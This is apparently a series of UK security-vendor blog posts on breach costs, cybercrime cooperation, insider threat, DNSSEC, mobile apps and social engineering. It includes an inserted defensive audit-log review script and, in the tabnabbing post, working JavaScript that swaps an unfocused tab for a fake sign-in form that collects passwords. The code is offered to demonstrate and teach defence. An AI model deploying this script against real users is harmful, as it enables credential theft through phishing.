Last week’s Cost of a Data Breach Study update had one particular statistic that stuck with me and to which I keep being drawn when discussing it with others. In the UK study, they found that where an organisation that suffered a breach had a Chief Information Security Officer (CISO), or someone with the equivalent level of responsibility, in place, the cost per record dropped by an average of £18. I think the key word in the previous sentence is “responsibility”, for a few reasons.
Firstly, there is the increasing range of fines and penalties that can be applied to the individuals involved in failing to deliver against expectations. These have spread beyond the original highly regulated industries into the broader business context. With the coming updates to EU legislation, the topic is likely to get more attention in the boardrooms of Britain, not less.
Secondly, and contrary to popular thinking, stopping data loss and protecting an organisation’s key information assets goes well beyond using scanners to stop credit card details being emailed out. Primarily, it is not a technical problem; it is a people-process-technology challenge.
In the past, I have heard references to people-process-technology being like a three-legged stool of which you can’t remove any without falling off! This can be considered a fair comparison but, for me, the ‘people’ part of this stool is the most critical starting point. People have negotiation skills. People have perspective. People drive change.
When it comes to the role of technology in stopping data loss, I view it as an exoskeleton for the people involved. That may sound a little sci-fi, but what those people need is to be able to say “this stuff is important; please tell me how it’s being used, where it’s going and who uses it”. Technology enables them to reach into network pipes with gigabits of data pumping through them. Technology enables them to piece together a process involving four employees and an outside contractor. Technology enables them to see that the HR director does not like using the VPN from his second home in the Cotswolds.
The reason I view it as an exoskeleton is that the knowledge of what’s important comes from the people involved, as does the appropriate response and the negotiation to get from where they are today, to a more secure future-state.
The relentless growth in information and systems shows we’re not moving towards a state where data loss won’t happen anymore. However, this report shows that if you put someone in charge, with the responsibility and authority to make change happen when it does occur, the impact on an organisation’s bottom line is significantly reduced. I’m happy to predict that the gap between those that take it seriously and those that stick their heads in the sand will only get larger in the coming years.
Recently, I once again joined delegates from across the globe in Strasbourg to speak at the Council of Europe’s Cooperation against Cybercrime Conference. Bringing together industry, law enforcement, legal and policy experts, the conference marked the 10th anniversary of the Budapest Convention – the first international treaty on online crime, which aims to define a common framework for cybercrime legislation.
In the decade since the treaty opened for signatures, 47 countries have signed, and 32 of those have converted it into local legislation. During the conference, seeing these countries stand up and proudly announce their efforts to implement cyber laws and, in some cases, even highlight early successful prosecutions, was a very powerful experience.
However, while the convention continues to represent a great step forward, with nearly 200 countries in the world it is important to recognise that there is still plenty of work to be done. Although not all of those countries are in Europe, a precedent has already been set, with non-European countries such as the USA, Canada and Japan signed up.
It was clear that the Council of Europe’s cybercrime initiative isn’t resting on its laurels, with the conference highlighting the next phases we can expect. These include plans to implement training for judges and law enforcement, regional workshops, intelligence gathering and sharing, and a look at the broader picture of international cyber strategy and the role that cybercrime plays in it.
The key topic that comes up year after year at the conference is ‘cooperation’, with the need and desire for public-private partnership seen as key to success. As an example of collaboration, 2Centre (www.2centre.eu) aims to bring together academia, industry and law enforcement to drive training and create centres of excellence. Thus far, centres of excellence are in the process of being created in France, Ireland, Belgium and Estonia, with requests from many others.
The other key topic is capacity. As countries develop legislation, the burden moves along the process: it puts new pressure on law enforcement to have scalable resources to investigate, to handle ever-increasing volumes of forensic data and to take on the challenge of internationally standardised evidence-gathering processes and techniques.
When you consider these two themes together, a clear risk is apparent: as more collaboration takes place, there simply is not, at this point in time, the resource to scale to the evolving scope of cybercrime.
While security vendors such as ourselves can provide insight on the scale and scope of what we are seeing – twenty-plus new threats per second – given the increased interdependency of networks and systems, greater coordination between the public and private sectors is vital. This can enable a common understanding, identification and recognition of possible cyber threats, and ensure that efforts and resources to address specific risks are effectively deployed. Information-sharing partnerships have a key role to play in effective cooperation against cyber threats and can help to distil information into tangible, actionable data that can then be used to address a specific risk and, where possible, provide alerts.
My overwhelming thought at the close of the conference was, however, that it’s always amazing to see such international cooperation. We all have a role to play and it’s only with all of our participation that we can succeed.
In recent years, I’ve attended numerous events looking at the subject of cyberspace and the related threats, so what made the event hosted by the Foreign Office different from those that came before? The first significant difference that comes to mind is the level of international support, with 60 countries coming together. Consequently, this event provided a real opportunity to take another step towards international discussion and co-operation on how to make the Internet a safer place for citizens, for businesses and for governments.
During the conference, I took part in a panel discussing “Policing in the Cyber Age”, focusing on the need for collaboration between law enforcement agencies, industry at large and the security industry. There were some great examples of initiatives to support tackling cybercrime, such as Symantec’s Norton Cybercrime Institute, which provides information on the genealogy of attacks, and training and support to law enforcement agencies and judges.
What was evident was that whilst organisations such as the Police Central e-crime Unit (PCeU) and SOCA (Serious Organised Crime Agency) are able to share some great case studies of how cybercrime cases are effectively investigated, and how cybercriminals have been caught and prosecuted, I heard other nations admit that they have had less success, with fewer than a handful of convictions to date.
What continues to stand out most to me are the additional hurdles that exist when dealing with cybercrime at an international level, from basic collaboration between agencies on victim attribution through to evidence and intelligence sharing. It would seem that there are still legal and technical obstacles to developing the partnerships needed to tackle cybercrime which, unless addressed, could become a cybercriminal’s best friend.
You could easily come away from such a conference feeling alarmed at the scale of the challenge still ahead, but for me it was all positive, for the following reasons. To start with, this was the first event of its kind, and there is already a commitment to repeat the gathering for the next two years. From my perspective, that is an encouraging sign that actions will follow.
Secondly, it is only when we openly discuss today’s challenges that we can start to see a way forward, and much of this is about smarter collaboration (between governments, law enforcement, legislators and industry).
Finally, we must remember that many countries around the world are at different stages of their digital development, and cybercrime is a relatively young problem. Many countries are still trying to get to grips with what legislation, resources and expertise, to name but a few aspects, they may need in order to address the problems they are facing.
My hope is that this collaboration can help to tackle many of these issues, yet even at this first event, some of the most fundamental challenges started to be addressed:
• Knowledge exchange and education are crucial
• The level of networking between the people, organisations and countries attending can only help raise the global bar of cybercrime prevention
• Skilled experts in criminology now need to translate their skills into global cyberspace.
… or “Who will watch the watchers?” In a recent case a malicious insider has admitted not to stealing information but, in effect, to adding to it. As an IT insider he had access to the systems which dealt with loyalty cards; he set up a number of bogus accounts and then filled them with points… that he could later spend.
A great deal of time and effort goes into protecting systems at the endpoint or servers in the datacentre, and companies now at least acknowledge the insider threat… but when it comes to applications there is still a naive assumption that “all our people are good”. Which brings us to the question: who is watching the people who are supposed to be watching the systems? Unfortunately there is very little that can be done to stop the determined malicious insider. After all, they have been given access to the systems, and often they are carrying out tasks they are authorised to perform. However, this is where good application design and usage policies can help. For a start, all administrators should have their own usernames and passwords – no sharing – so that every privileged action can be tied to one person. There should also be good logs / audit trails, especially for functionality requiring additional privileges, written somewhere the administrators being audited cannot edit or delete them. Finally, there needs to be some means of reviewing the log files, either automatically or manually… and preferably not by one individual, otherwise they could become the malicious insider. Often just informing people that this functionality and policy is in place will deter the potential casual insider… and for those who are not deterred, at least you now have some evidence.
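As an added illustration of the kind of automated log review described above (example code written for this page, not from the original post or the case it mentions), here is a small Node.js script that runs three review rules over a constructed audit trail from a loyalty-points application: privileged actions performed under a shared login, privileged actions with no business reference (till, ticket or approval), and an account credited by the same person who created it. The log format, the field names and the rules themselves are assumptions made for this example.

```javascript
// Added example (not from the original post): reviewing an application audit
// trail for the insider pattern described above. The log layout and the rules
// are assumptions for this illustration, and every log line is constructed.
const AUDIT_LOG = `
2011-03-01T09:02:11Z actor=mkhan  role=clerk action=CREATE_ACCOUNT account=LC1001 ref=TILL-5521
2011-03-01T09:02:40Z actor=aliu   role=clerk action=CREDIT_POINTS  account=LC1001 points=120 ref=TILL-5521
2011-03-01T23:14:02Z actor=jsmith role=admin action=CREATE_ACCOUNT account=LC9001 ref=-
2011-03-01T23:14:30Z actor=jsmith role=admin action=CREDIT_POINTS  account=LC9001 points=50000 ref=-
2011-03-02T10:30:00Z actor=admin  role=admin action=CREDIT_POINTS  account=LC1002 points=200 ref=TILL-5530
2011-03-02T10:31:00Z actor=mkhan  role=clerk action=VIEW_ACCOUNT   account=LC1003 ref=-
`;

// Generic logins that cannot be tied to one person ("no sharing").
const SHARED_ACCOUNTS = new Set(["admin", "root", "sysadmin"]);
// Functions that create accounts or change balances deserve extra scrutiny.
const PRIVILEGED_ACTIONS = new Set(["CREATE_ACCOUNT", "CREDIT_POINTS"]);

// Parse "timestamp key=value key=value ..." lines into plain objects.
function parseAuditLog(text) {
  return text
    .trim()
    .split("\n")
    .map((line) => {
      const [ts, ...fields] = line.trim().split(/\s+/);
      const event = { ts };
      for (const field of fields) {
        const [key, value] = field.split("=");
        event[key] = value;
      }
      if (event.points !== undefined) event.points = Number(event.points);
      return event;
    });
}

// Apply the three review rules and return the findings, oldest first.
function reviewAuditLog(text) {
  const findings = [];
  const createdBy = new Map(); // account -> actor who created it

  for (const ev of parseAuditLog(text)) {
    const flag = (rule) =>
      findings.push({ rule, ts: ev.ts, actor: ev.actor, account: ev.account });

    // Rule 1: a privileged action under a shared login has no accountable person.
    if (SHARED_ACCOUNTS.has(ev.actor) && PRIVILEGED_ACTIONS.has(ev.action)) {
      flag("shared-account");
    }
    // Rule 2: a privileged action with no business reference behind it.
    if (PRIVILEGED_ACTIONS.has(ev.action) && ev.ref === "-") {
      flag("no-business-reference");
    }
    // Rule 3: the same person created the account and then credited it
    // (the bogus-accounts pattern; a separation-of-duties failure).
    if (ev.action === "CREATE_ACCOUNT") createdBy.set(ev.account, ev.actor);
    if (ev.action === "CREDIT_POINTS" && createdBy.get(ev.account) === ev.actor) {
      flag("self-created-account-credited");
    }
  }
  return findings;
}

// One line per finding, for a human reviewer.
function formatFindings(findings) {
  return findings.map((f) => `${f.ts} ${f.rule.padEnd(30)} actor=${f.actor} account=${f.account}`);
}
```

Running `reviewAuditLog(AUDIT_LOG)` on the constructed log flags the two out-of-hours `jsmith` actions (no reference, and crediting an account he created himself) and the credit made under the shared `admin` login; the clerk’s read-only `VIEW_ACCOUNT` with no reference is ignored because it is not a privileged action. In practice the script reading the log should run from a host, and against a copy of the log, that the application administrators cannot write to, and its output should land with a second person.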
Today the Domain Name System Security Extensions (DNSSEC) public key gets added to the ‘root’ name servers; in other words, the root zone is now signed. Some commentators, such as Alex Pawlik quoted in ZDNet, predict it will be a ‘Black Thursday’ for cyber attackers, with malicious DNS redirects becoming a thing of the past. I’m not so sure we should talk about this as a panacea, but it’s certainly a step in the right direction.
The implementation of DNSSEC has been a long time coming, and each milestone passed is a necessary step in the right direction. The signing of responses from the 13 root zone server clusters today should be seen in that context: it’s a start, and a very big one. However, any expectation that this milestone marks the date on which the Internet suddenly becomes safe is exaggerated.
To be effective, DNSSEC needs to be implemented down the whole DNS chain, from the root through the top-level domains to your ISP or company: each zone has to be signed, its parent has to publish a DS record pointing at the child’s key, and the resolver your machines actually use has to validate the signatures. A single unsigned link leaves everything below it unprotected, and even a fully validated answer is only as safe as the path between the validating resolver and the machine that asked, since most stub resolvers simply trust the ‘authenticated’ flag the resolver sets. So there are still many more milestones to be achieved before DNSSEC can deliver on its promise, even if cyber criminals don’t identify ways around the signed-response safeguard.
With the news that a couple of Android apps have been pulled because they misrepresented their purpose (they were used as research, duping users into downloading and installing them to see whether people would), it raises another interesting question for IT departments around applications, mobile devices and keeping up with the user.
While companies have been getting stricter about what can and cannot be installed on corporate laptops, the same is not true of smartphones. There are now tens of thousands of apps for phones like the iPhone and Android handsets, and while they do have to go through an approval process, it won’t be your corporate one.
I have recently been involved in writing security policies for a number of companies, and the need for up-to-date policies coupled with a suitable education programme becomes very apparent. Technology is moving rapidly, and care needs to be taken to protect corporate data wherever it is and however it is accessed. Updates to policies are worthless if they are not effectively communicated – this is a case in point – updating the policy on downloading apps won’t stop people from doing it if they don’t know about it. If you have technology to prevent inappropriate apps from being installed on smartphones, great – if not, then you need to remind staff of some of the dangers of just downloading and installing apps from the web.
Cyber criminals go after the low hanging fruit and the smartphone is just that – a simple way into a person’s life and potentially the corporate network.
We have been talking about Information Security for a few years now, but with the changes in legislation earlier this year that mean you can incur fines of up to £500K, it’s time to look beyond the reactive and towards the proactive. Time to move from Information Security to Information Assurance.
So why Information Assurance rather than just Information Security? Businesses rely on information, and most realise that accurate, available and appropriately shared information is key to growing a business. Conversely, missing or inaccurate information in the wrong hands will damage the business and potentially the business’ reputation.
From a security aspect, only the security of the information and systems is taken into account. Data loss prevention and all the now-commonplace measures to prevent it, coupled with endpoint and datacentre security strategies, enable companies to ‘tick the box’. Reporting and auditing are key if this is to be provable, so that information is kept safe and the newspapers and legislators held at bay. Assurance is all this – and more! Information assurance is about assessing the business’ ability to keep information safe, accurate and available – to the right people at the right time. It’s about developing a shared understanding across all areas of the business of how information is used, and it’s about improving the information available according to business priorities.
As we start to move out of recession, but while the purse strings are still tightly held, it is time to revisit information strategies and look at how information can be used more effectively to drive the business. New rapid assessment services are starting to appear which can build on your information security policies and turn them into information assurance ones.
… What? A new browser-based threat has been demonstrated – just to show it can be done. However, rest assured, it will be used for real in the near future. It’s called tabnabbing… sort of like kidnapping, but with the tabs in your browser. The way it works is that you visit a malicious page and, when you navigate away from its tab, it changes the tab’s title and its content.
The social engineering at work here is that most people have multiple tabs open in their browsers at the same time and don’t really remember which is which (why would you?), so you click on the one you think you need (but it has been tabnabbed) and re-enter your details… mistake! As for how easy it is… take a look at this page which shows how it works, then open another tab, wait 5 seconds and return to the old one!
What to do? Well, the problem with these sorts of attacks is that they are tough to block, as there are legitimate uses for the functionality involved – think about auto-logout from online banking systems, which rewrites the page when you have been away. So the best way to combat it is to educate people about the risk – send out an email today! The one thing the page cannot change is the address in the browser’s location bar, so the habit to teach is: before re-entering a password into a tab you left a while ago, check that the address is the one you expect. (Of course, hopefully you will have anti-malware installed as well, which will help prevent you from going to dodgy sites etc…)
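For readers who want to see the mechanics rather than just the demo page, here is an added example (written for this page, not the original demonstration and not from the post) of how a tabnabbing page works: it waits for the tab to lose focus, starts a timer, and when the timer fires it swaps the document title and body for a lookalike sign-in form. The window and document are passed in as parameters so the swap logic can be exercised outside a browser; the brand name, title, delay and form markup are assumptions for the demonstration, and the form posts to a made-up `/collect` path.

```javascript
// Added example (not from the original post): the mechanics of a tabnabbing
// page. `win` and `doc` are injected so the logic can be exercised without a
// browser; in a real page you would pass window and document. The target
// brand, title, delay and form markup are assumptions for this demonstration.
const NAB_DELAY_MS = 5000;

// A lookalike "session expired" sign-in form. A real attacker would copy the
// target site's markup and point the form at a server they control.
function lookalikeLoginPage(brand) {
  return `<h1>${brand}</h1>` +
    `<p>Your session has expired. Please sign in again.</p>` +
    `<form method="post" action="/collect">` +
    `<input name="user" placeholder="Email"> ` +
    `<input name="pass" type="password" placeholder="Password"> ` +
    `<button type="submit">Sign in</button></form>`;
}

function installTabnab(win, doc, target, delayMs = NAB_DELAY_MS) {
  const original = { title: doc.title, body: doc.body.innerHTML };
  let timer = null;
  let nabbed = false;

  // The swap: tab title and page content change; the address bar does not.
  function nab() {
    timer = null;
    doc.title = target.title;
    doc.body.innerHTML = lookalikeLoginPage(target.brand);
    nabbed = true;
  }
  // The user switched to another tab: start the clock.
  function onBlur() {
    if (!nabbed && timer === null) timer = win.setTimeout(nab, delayMs);
  }
  // The user came back before the clock ran out: stay innocent-looking.
  function onFocus() {
    if (timer !== null) {
      win.clearTimeout(timer);
      timer = null;
    }
  }
  // Put the page back (useful when demonstrating the effect to staff).
  function restore() {
    doc.title = original.title;
    doc.body.innerHTML = original.body;
    nabbed = false;
  }

  win.addEventListener("blur", onBlur);
  win.addEventListener("focus", onFocus);
  return { onBlur, onFocus, restore, isNabbed: () => nabbed };
}

// In a browser, wire it up against the real window and document.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  installTabnab(window, document, { brand: "Example Webmail", title: "Sign in - Example Webmail" });
}
```

Everything the script touches (title, content, and in the original demonstration the favicon too) is under the page’s own control, which is why no browser setting stops it; what it cannot touch is the URL in the location bar, so that is the tell to look for. A password manager that only fills credentials on the site they were saved for will also refuse to fill this form, which is one more reason to encourage their use.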
I was on a train yesterday and couldn’t help but overhear a conversation that went something like this…
“He’s sent me the mortgage details on email… could you get them for me and tell me what it says?”
“Sure, I use XXX, my username is YYY and my password is ZZZ.”
Good grief… I thought everyone knew that you were supposed to keep usernames and passwords ‘secret’. Evidently not. Of course this is the basic problem… people are trying to do something important to them - and are not thinking about security.
There are instances where sharing confidential information is required, and when in ‘work’ mode, people (sometimes) think twice about who can overhear but move into a non-work mindset and common sense disappears. In this instance, it would have been better to have waited until they could check their email themselves, or wait until they could find somewhere more private to speak, or even to have SMS’d the details (ideally in more than one text). In fact anything would have been better than shouting the details on a crowded train.
Oh well… it serves as a good reminder to us all that you should think twice when dealing with confidential information, especially when in public places. Cyber-criminals are not fussy how they obtain the information they need… the easier, the better.
PS A quiet word to the person on the train as I left suggesting that changing their password would be a good idea as everyone in the whole carriage now knew it – seemed a reasonable thing to do. Of course whether they do it or not… time will tell.
Football star David Beckham is the latest victim of a worrying scam by online fraudsters using the popular social networking phenomenon, Twitter, as a vehicle for spam advertising.
According to Candid Wueest, senior threat researcher at Symantec, the fraudsters create a fake Twitter account, often in the name of a celebrity, and then attempt to become followers of legitimate Twitter account holders.
“In this case, the false David – an online Chinese retailer – followed over a thousand accounts with a single common link – the account name contains the word ‘candid’.
“The credibility of the fake account is bolstered by other fraudulent accounts linking back to it and by cross-following legitimate Twitter accounts, which have been hacked,” he says.
Wueest confirms that this type of malicious activity is fast becoming common practice and adds that the rogue tweets often include short links pointing to infected websites.
“This proves that spammers are keeping abreast of new technologies. Twitter users are advised to carefully check out the details of all prospective followers and never to respond to ‘suspicious’ direct messages,” he says.
Peter G Rae